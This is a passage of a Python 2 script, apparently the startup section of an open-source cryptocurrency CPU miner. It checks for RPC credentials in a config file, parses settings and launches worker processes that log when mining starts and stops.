settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|